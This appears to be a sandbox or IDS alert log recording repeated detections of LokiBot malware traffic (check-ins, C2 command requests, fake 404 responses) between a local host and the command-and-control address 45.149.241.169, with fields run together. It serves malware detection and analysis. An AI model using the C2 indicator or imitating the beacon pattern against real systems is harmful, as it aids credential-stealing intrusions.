                                                        2024-10-03T09:21:10.996788+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436445.149.241.16980TCP
                                                        2024-10-03T09:21:10.996788+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436445.149.241.16980TCP
                                                        2024-10-03T09:21:10.996788+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436445.149.241.16980TCP
                                                        2024-10-03T09:21:11.918002+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436445.149.241.16980TCP
                                                        2024-10-03T09:21:11.918002+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436445.149.241.16980TCP
                                                        2024-10-03T09:21:11.926165+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164364TCP
                                                        2024-10-03T09:21:12.112321+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436545.149.241.16980TCP
                                                        2024-10-03T09:21:12.112321+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436545.149.241.16980TCP
                                                        2024-10-03T09:21:12.112321+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436545.149.241.16980TCP
                                                        2024-10-03T09:21:12.880481+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436545.149.241.16980TCP
                                                        2024-10-03T09:21:12.880481+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436545.149.241.16980TCP
                                                        2024-10-03T09:21:12.885827+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164365TCP
                                                        2024-10-03T09:21:13.055508+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436645.149.241.16980TCP
                                                        2024-10-03T09:21:13.055508+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436645.149.241.16980TCP
                                                        2024-10-03T09:21:13.055508+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436645.149.241.16980TCP
                                                        2024-10-03T09:21:13.766337+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436645.149.241.16980TCP
                                                        2024-10-03T09:21:13.766337+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436645.149.241.16980TCP
                                                        2024-10-03T09:21:13.771289+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164366TCP
                                                        2024-10-03T09:21:13.916854+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436745.149.241.16980TCP
                                                        2024-10-03T09:21:13.916854+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436745.149.241.16980TCP
                                                        2024-10-03T09:21:13.916854+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436745.149.241.16980TCP
                                                        2024-10-03T09:21:14.575323+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436745.149.241.16980TCP
                                                        2024-10-03T09:21:14.575323+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436745.149.241.16980TCP
                                                        2024-10-03T09:21:14.606299+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164367TCP
                                                        2024-10-03T09:21:14.881238+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436845.149.241.16980TCP
                                                        2024-10-03T09:21:14.881238+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436845.149.241.16980TCP
                                                        2024-10-03T09:21:14.881238+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436845.149.241.16980TCP
                                                        2024-10-03T09:21:15.899147+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436845.149.241.16980TCP
                                                        2024-10-03T09:21:15.899147+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436845.149.241.16980TCP
                                                        2024-10-03T09:21:16.059969+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116436945.149.241.16980TCP
                                                        2024-10-03T09:21:16.059969+02002025381ET MALWARE LokiBot Checkin1192.168.2.116436945.149.241.16980TCP
                                                        2024-10-03T09:21:16.059969+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116436945.149.241.16980TCP
                                                        2024-10-03T09:21:16.915649+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116436945.149.241.16980TCP
                                                        2024-10-03T09:21:16.915649+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116436945.149.241.16980TCP
                                                        2024-10-03T09:21:16.922230+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164369TCP
                                                        2024-10-03T09:21:17.083633+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116437045.149.241.16980TCP
                                                        2024-10-03T09:21:17.083633+02002025381ET MALWARE LokiBot Checkin1192.168.2.116437045.149.241.16980TCP
                                                        2024-10-03T09:21:17.083633+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116437045.149.241.16980TCP
                                                        2024-10-03T09:21:17.866524+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116437045.149.241.16980TCP
                                                        2024-10-03T09:21:17.866524+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116437045.149.241.16980TCP
                                                        2024-10-03T09:21:17.872168+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164370TCP
                                                        2024-10-03T09:21:18.023488+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116437145.149.241.16980TCP
                                                        2024-10-03T09:21:18.023488+02002025381ET MALWARE LokiBot Checkin1192.168.2.116437145.149.241.16980TCP
                                                        2024-10-03T09:21:18.023488+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116437145.149.241.16980TCP
                                                        2024-10-03T09:21:19.008215+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116437145.149.241.16980TCP
                                                        2024-10-03T09:21:19.008215+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116437145.149.241.16980TCP
                                                        2024-10-03T09:21:19.175709+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116437245.149.241.16980TCP
                                                        2024-10-03T09:21:19.175709+02002025381ET MALWARE LokiBot Checkin1192.168.2.116437245.149.241.16980TCP
                                                        2024-10-03T09:21:19.175709+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116437245.149.241.16980TCP
                                                        2024-10-03T09:21:21.428539+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116437245.149.241.16980TCP
                                                        2024-10-03T09:21:21.428539+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116437245.149.241.16980TCP
                                                        2024-10-03T09:21:21.433380+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164372TCP
                                                        2024-10-03T09:21:21.592824+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116437345.149.241.16980TCP
                                                        2024-10-03T09:21:21.592824+02002025381ET MALWARE LokiBot Checkin1192.168.2.116437345.149.241.16980TCP
                                                        2024-10-03T09:21:21.592824+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116437345.149.241.16980TCP
                                                        2024-10-03T09:21:22.234810+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116437345.149.241.16980TCP
                                                        2024-10-03T09:21:22.234810+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116437345.149.241.16980TCP
                                                        2024-10-03T09:21:22.239708+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164373TCP
                                                        2024-10-03T09:21:22.386915+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116437445.149.241.16980TCP
                                                        2024-10-03T09:21:22.386915+02002025381ET MALWARE LokiBot Checkin1192.168.2.116437445.149.241.16980TCP
                                                        2024-10-03T09:21:22.386915+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116437445.149.241.16980TCP
                                                        2024-10-03T09:21:23.090242+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116437445.149.241.16980TCP
                                                        2024-10-03T09:21:23.090242+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116437445.149.241.16980TCP
                                                        2024-10-03T09:21:23.095072+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164374TCP
                                                        2024-10-03T09:21:23.246842+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116437545.149.241.16980TCP
                                                        2024-10-03T09:21:23.246842+02002025381ET MALWARE LokiBot Checkin1192.168.2.116437545.149.241.16980TCP
                                                        2024-10-03T09:21:23.246842+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116437545.149.241.16980TCP
                                                        2024-10-03T09:21:23.948484+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116437545.149.241.16980TCP
                                                        2024-10-03T09:21:23.948484+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116437545.149.241.16980TCP
                                                        2024-10-03T09:21:23.953248+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164375TCP
                                                        2024-10-03T09:21:24.104473+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116437645.149.241.16980TCP
                                                        2024-10-03T09:21:24.104473+02002025381ET MALWARE LokiBot Checkin1192.168.2.116437645.149.241.16980TCP
                                                        2024-10-03T09:21:24.104473+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116437645.149.241.16980TCP
                                                        2024-10-03T09:21:24.875611+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116437645.149.241.16980TCP
                                                        2024-10-03T09:21:24.875611+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116437645.149.241.16980TCP
                                                        2024-10-03T09:21:24.880426+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164376TCP
                                                        2024-10-03T09:21:25.029228+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116437845.149.241.16980TCP
                                                        2024-10-03T09:21:25.029228+02002025381ET MALWARE LokiBot Checkin1192.168.2.116437845.149.241.16980TCP
                                                        2024-10-03T09:21:25.029228+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116437845.149.241.16980TCP
                                                        2024-10-03T09:21:25.669335+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116437845.149.241.16980TCP
                                                        2024-10-03T09:21:25.669335+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116437845.149.241.16980TCP
                                                        2024-10-03T09:21:25.674220+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164378TCP
                                                        2024-10-03T09:21:25.820375+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116437945.149.241.16980TCP
                                                        2024-10-03T09:21:25.820375+02002025381ET MALWARE LokiBot Checkin1192.168.2.116437945.149.241.16980TCP
                                                        2024-10-03T09:21:25.820375+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116437945.149.241.16980TCP
                                                        2024-10-03T09:21:26.688958+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116437945.149.241.16980TCP
                                                        2024-10-03T09:21:26.688958+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116437945.149.241.16980TCP
                                                        2024-10-03T09:21:26.693893+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164379TCP
                                                        2024-10-03T09:21:26.851586+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438045.149.241.16980TCP
                                                        2024-10-03T09:21:26.851586+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438045.149.241.16980TCP
                                                        2024-10-03T09:21:26.851586+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438045.149.241.16980TCP
                                                        2024-10-03T09:21:27.634586+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438045.149.241.16980TCP
                                                        2024-10-03T09:21:27.634586+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438045.149.241.16980TCP
                                                        2024-10-03T09:21:27.639571+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164380TCP
                                                        2024-10-03T09:21:27.810227+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438145.149.241.16980TCP
                                                        2024-10-03T09:21:27.810227+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438145.149.241.16980TCP
                                                        2024-10-03T09:21:27.810227+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438145.149.241.16980TCP
                                                        2024-10-03T09:21:28.548334+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438145.149.241.16980TCP
                                                        2024-10-03T09:21:28.548334+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438145.149.241.16980TCP
                                                        2024-10-03T09:21:28.553342+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164381TCP
                                                        2024-10-03T09:21:28.697925+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438245.149.241.16980TCP
                                                        2024-10-03T09:21:28.697925+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438245.149.241.16980TCP
                                                        2024-10-03T09:21:28.697925+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438245.149.241.16980TCP
                                                        2024-10-03T09:21:29.432337+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438245.149.241.16980TCP
                                                        2024-10-03T09:21:29.432337+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438245.149.241.16980TCP
                                                        2024-10-03T09:21:29.437160+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164382TCP
                                                        2024-10-03T09:21:29.591807+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438345.149.241.16980TCP
                                                        2024-10-03T09:21:29.591807+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438345.149.241.16980TCP
                                                        2024-10-03T09:21:29.591807+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438345.149.241.16980TCP
                                                        2024-10-03T09:21:30.259881+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438345.149.241.16980TCP
                                                        2024-10-03T09:21:30.259881+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438345.149.241.16980TCP
                                                        2024-10-03T09:21:30.264753+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164383TCP
                                                        2024-10-03T09:21:30.413511+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438445.149.241.16980TCP
                                                        2024-10-03T09:21:30.413511+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438445.149.241.16980TCP
                                                        2024-10-03T09:21:30.413511+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438445.149.241.16980TCP
                                                        2024-10-03T09:21:31.213756+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438445.149.241.16980TCP
                                                        2024-10-03T09:21:31.213756+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438445.149.241.16980TCP
                                                        2024-10-03T09:21:31.218885+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164384TCP
                                                        2024-10-03T09:21:31.498785+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438545.149.241.16980TCP
                                                        2024-10-03T09:21:31.498785+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438545.149.241.16980TCP
                                                        2024-10-03T09:21:31.498785+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438545.149.241.16980TCP
                                                        2024-10-03T09:21:32.591622+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438545.149.241.16980TCP
                                                        2024-10-03T09:21:32.591622+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438545.149.241.16980TCP
                                                        2024-10-03T09:21:32.603314+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164385TCP
                                                        2024-10-03T09:21:32.743030+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438645.149.241.16980TCP
                                                        2024-10-03T09:21:32.743030+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438645.149.241.16980TCP
                                                        2024-10-03T09:21:32.743030+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438645.149.241.16980TCP
                                                        2024-10-03T09:21:33.386243+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438645.149.241.16980TCP
                                                        2024-10-03T09:21:33.386243+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438645.149.241.16980TCP
                                                        2024-10-03T09:21:33.391128+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164386TCP
                                                        2024-10-03T09:21:33.556187+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438745.149.241.16980TCP
                                                        2024-10-03T09:21:33.556187+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438745.149.241.16980TCP
                                                        2024-10-03T09:21:33.556187+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438745.149.241.16980TCP
                                                        2024-10-03T09:21:35.070962+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438745.149.241.16980TCP
                                                        2024-10-03T09:21:35.070962+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438745.149.241.16980TCP
                                                        2024-10-03T09:21:35.071057+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164387TCP
                                                        2024-10-03T09:21:35.239657+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438845.149.241.16980TCP
                                                        2024-10-03T09:21:35.239657+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438845.149.241.16980TCP
                                                        2024-10-03T09:21:35.239657+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438845.149.241.16980TCP
                                                        2024-10-03T09:21:46.491936+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438845.149.241.16980TCP
                                                        2024-10-03T09:21:46.491936+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438845.149.241.16980TCP
                                                        2024-10-03T09:21:46.647501+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116438945.149.241.16980TCP
                                                        2024-10-03T09:21:46.647501+02002025381ET MALWARE LokiBot Checkin1192.168.2.116438945.149.241.16980TCP
                                                        2024-10-03T09:21:46.647501+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116438945.149.241.16980TCP
                                                        2024-10-03T09:21:47.323870+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116438945.149.241.16980TCP
                                                        2024-10-03T09:21:47.323870+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116438945.149.241.16980TCP
                                                        2024-10-03T09:21:47.328778+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164389TCP
                                                        2024-10-03T09:21:47.487101+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439045.149.241.16980TCP
                                                        2024-10-03T09:21:47.487101+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439045.149.241.16980TCP
                                                        2024-10-03T09:21:47.487101+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439045.149.241.16980TCP
                                                        2024-10-03T09:21:48.281112+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439045.149.241.16980TCP
                                                        2024-10-03T09:21:48.281112+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439045.149.241.16980TCP
                                                        2024-10-03T09:21:48.285934+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164390TCP
                                                        2024-10-03T09:21:48.440836+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439145.149.241.16980TCP
                                                        2024-10-03T09:21:48.440836+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439145.149.241.16980TCP
                                                        2024-10-03T09:21:48.440836+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439145.149.241.16980TCP
                                                        2024-10-03T09:21:49.089316+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439145.149.241.16980TCP
                                                        2024-10-03T09:21:49.089316+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439145.149.241.16980TCP
                                                        2024-10-03T09:21:49.095497+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164391TCP
                                                        2024-10-03T09:21:49.258711+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439245.149.241.16980TCP
                                                        2024-10-03T09:21:49.258711+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439245.149.241.16980TCP
                                                        2024-10-03T09:21:49.258711+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439245.149.241.16980TCP
                                                        2024-10-03T09:21:50.342573+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439245.149.241.16980TCP
                                                        2024-10-03T09:21:50.342573+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439245.149.241.16980TCP
                                                        2024-10-03T09:21:50.342633+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164392TCP
                                                        2024-10-03T09:21:50.499694+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439345.149.241.16980TCP
                                                        2024-10-03T09:21:50.499694+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439345.149.241.16980TCP
                                                        2024-10-03T09:21:50.499694+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439345.149.241.16980TCP
                                                        2024-10-03T09:21:51.138044+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439345.149.241.16980TCP
                                                        2024-10-03T09:21:51.138044+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439345.149.241.16980TCP
                                                        2024-10-03T09:21:51.142841+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164393TCP
                                                        2024-10-03T09:21:51.287566+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439445.149.241.16980TCP
                                                        2024-10-03T09:21:51.287566+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439445.149.241.16980TCP
                                                        2024-10-03T09:21:51.287566+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439445.149.241.16980TCP
                                                        2024-10-03T09:21:51.987281+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439445.149.241.16980TCP
                                                        2024-10-03T09:21:51.987281+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439445.149.241.16980TCP
                                                        2024-10-03T09:21:51.992201+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164394TCP
                                                        2024-10-03T09:21:52.148748+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439545.149.241.16980TCP
                                                        2024-10-03T09:21:52.148748+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439545.149.241.16980TCP
                                                        2024-10-03T09:21:52.148748+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439545.149.241.16980TCP
                                                        2024-10-03T09:21:52.824432+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439545.149.241.16980TCP
                                                        2024-10-03T09:21:52.824432+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439545.149.241.16980TCP
                                                        2024-10-03T09:21:52.829891+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164395TCP
                                                        2024-10-03T09:21:52.981934+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439645.149.241.16980TCP
                                                        2024-10-03T09:21:52.981934+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439645.149.241.16980TCP
                                                        2024-10-03T09:21:52.981934+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439645.149.241.16980TCP
                                                        2024-10-03T09:21:53.813148+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439645.149.241.16980TCP
                                                        2024-10-03T09:21:53.813148+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439645.149.241.16980TCP
                                                        2024-10-03T09:21:53.827051+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164396TCP
                                                        2024-10-03T09:21:54.007169+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439745.149.241.16980TCP
                                                        2024-10-03T09:21:54.007169+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439745.149.241.16980TCP
                                                        2024-10-03T09:21:54.007169+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439745.149.241.16980TCP
                                                        2024-10-03T09:21:54.779943+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439745.149.241.16980TCP
                                                        2024-10-03T09:21:54.779943+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439745.149.241.16980TCP
                                                        2024-10-03T09:21:54.795139+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164397TCP
                                                        2024-10-03T09:21:54.945256+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439845.149.241.16980TCP
                                                        2024-10-03T09:21:54.945256+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439845.149.241.16980TCP
                                                        2024-10-03T09:21:54.945256+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439845.149.241.16980TCP
                                                        2024-10-03T09:21:55.743930+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439845.149.241.16980TCP
                                                        2024-10-03T09:21:55.743930+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439845.149.241.16980TCP
                                                        2024-10-03T09:21:55.749129+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164398TCP
                                                        2024-10-03T09:21:55.920209+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116439945.149.241.16980TCP
                                                        2024-10-03T09:21:55.920209+02002025381ET MALWARE LokiBot Checkin1192.168.2.116439945.149.241.16980TCP
                                                        2024-10-03T09:21:55.920209+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116439945.149.241.16980TCP
                                                        2024-10-03T09:21:57.049613+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116439945.149.241.16980TCP
                                                        2024-10-03T09:21:57.049613+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116439945.149.241.16980TCP
                                                        2024-10-03T09:21:57.080376+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164399TCP
                                                        2024-10-03T09:21:57.220850+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440045.149.241.16980TCP
                                                        2024-10-03T09:21:57.220850+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440045.149.241.16980TCP
                                                        2024-10-03T09:21:57.220850+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440045.149.241.16980TCP
                                                        2024-10-03T09:21:58.009483+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440045.149.241.16980TCP
                                                        2024-10-03T09:21:58.009483+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440045.149.241.16980TCP
                                                        2024-10-03T09:21:58.015493+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164400TCP
                                                        2024-10-03T09:21:58.171912+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440145.149.241.16980TCP
                                                        2024-10-03T09:21:58.171912+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440145.149.241.16980TCP
                                                        2024-10-03T09:21:58.171912+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440145.149.241.16980TCP
                                                        2024-10-03T09:21:58.968924+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440145.149.241.16980TCP
                                                        2024-10-03T09:21:58.968924+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.116440145.149.241.16980TCP
                                                        2024-10-03T09:21:58.973834+02002025483ET MALWARE LokiBot Fake 404 Response145.149.241.16980192.168.2.1164401TCP
                                                        2024-10-03T09:21:59.151255+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.116440245.149.241.16980TCP
                                                        2024-10-03T09:21:59.151255+02002025381ET MALWARE LokiBot Checkin1192.168.2.116440245.149.241.16980TCP
                                                        2024-10-03T09:21:59.151255+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.116440245.149.241.16980TCP
                                                        2024-10-03T09:21:59.912717+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.116440245.149.241.16980TCP
